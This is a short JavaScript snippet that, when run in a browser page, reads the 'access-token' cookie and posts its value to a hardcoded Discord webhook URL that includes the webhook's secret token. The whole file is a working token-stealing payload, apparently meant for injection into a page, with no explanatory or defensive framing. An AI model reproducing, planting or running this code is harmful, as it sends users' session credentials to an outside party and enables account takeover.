(function() {
  var cookies = document.cookie.split('; ');
  var accessTokenCookie = '';

  for (var i = 0; i < cookies.length; i++) {
    var cookie = cookies[i].split('=');
    if (cookie[0] === 'access-token') {
      accessTokenCookie = cookie[1];
      break;
    }
  }

  var webhookUrl = "https://discord.com/api/webhooks/1132223177246904340/D4G5hOjWIcXAkauSOP6jyeVkyKihn9KwREu88wzdVkAFIAROkrNz32XpRmFpETNXtV0f";
  
  var payload = { content: accessTokenCookie };

  fetch(webhookUrl, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify(payload),
  });
})();